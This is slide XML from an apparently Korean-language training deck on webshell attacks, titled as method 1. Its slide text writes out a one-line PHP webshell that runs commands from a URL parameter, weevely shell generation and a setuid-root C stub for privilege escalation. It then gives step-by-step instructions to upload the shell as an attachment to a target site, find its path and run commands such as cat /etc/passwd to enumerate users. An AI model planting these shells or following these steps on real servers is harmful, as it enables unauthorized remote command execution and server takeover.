            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F497BAFF-A3AA-4C33-B9B4-00AC67500DA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="1968500"/>
            <a:ext cx="5913238" cy="4686300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Console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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@@@ CentOS, Ubuntu, Kali @@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# vi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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webshell.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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&lt;?php system($_GET[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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’]); ?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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@@@ Kali @@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 generate 123456 /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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weevely.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 generate [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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비밀번호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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파일저장경로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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@@@ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="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권한 상승 스크립트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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@@@</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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# vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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amdinget.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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main(){ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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setgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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(0); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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(0); }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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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86858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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D596D0E-2D5B-400C-AB45-F289340FA26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" r="-182" b="-23311"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="6962066"/>
            <a:ext cx="5913238" cy="2270834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공격할 웹사이트에 로그인하고 만들어 둔 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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webshell.php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스크립트를 첨부파일로 업로드한다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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첨부파일의 저장경로는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*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글 읽기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-&gt;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파일 위에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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우클릭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-&gt;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파일 경로 복사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-&gt;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메모장에 붙여넣기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*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로 체크할 수 있다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</a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL-1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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92687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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86EFFAF-D37A-4BBF-A3CC-77997F527FA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" t="-400" r="11" b="-29410"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="4686300"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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0" y="5266946"/>
            <a:ext cx="5913238" cy="3965954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위에 슬라이드의 방법으로 찾아낸 경로로 접속이 되는지 확인한다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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접속 가능한 것과 방금 올린 파일이 존재하는 것을 확인 할 수 있다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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맨 밑줄에는 웹서버의 버전과 운영체제 그리고 아이피와 포트번호까지 뜨는 것을 볼 수 있다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  <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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92401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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>공격 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>방법 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>번</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="그림 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86EFFAF-D37A-4BBF-A3CC-77997F527FA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" r="-272" b="-853"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="5911850" cy="2164587"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C22B3298-BA6E-4B4B-9471-089AD99936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60921" y="4361940"/>
            <a:ext cx="5913238" cy="5277354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올라간 파일을 클릭하여 열린 브라우저의 경로로 원하는 명령어를 입력하여 준다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  <a:b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</a:br>
            <a:b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</a:br>
            <a:b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</a:br>
            <a:b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</a:br>
            <a:b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</a:br>
            <a:b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</a:br>
            <a:b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</a:b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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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아래로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ls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명령어가 정상적으로 실행된다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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Ifconfig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나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cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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etc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/passwd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도 실행해 보고 결과가 정상적으로 나오는지 확인한다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  <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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passwd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파일을 확인하면 어떤 유저들이 있는지 확인 할 수 있다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 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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4" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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WEBSHELL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B241DA0-E27F-482F-B34B-8830E0C5CB2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" t="43509" r="-390" b="-1785"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="485229" y="5268717"/>
            <a:ext cx="5911850" cy="1440549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="B7D7D8"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21847660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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
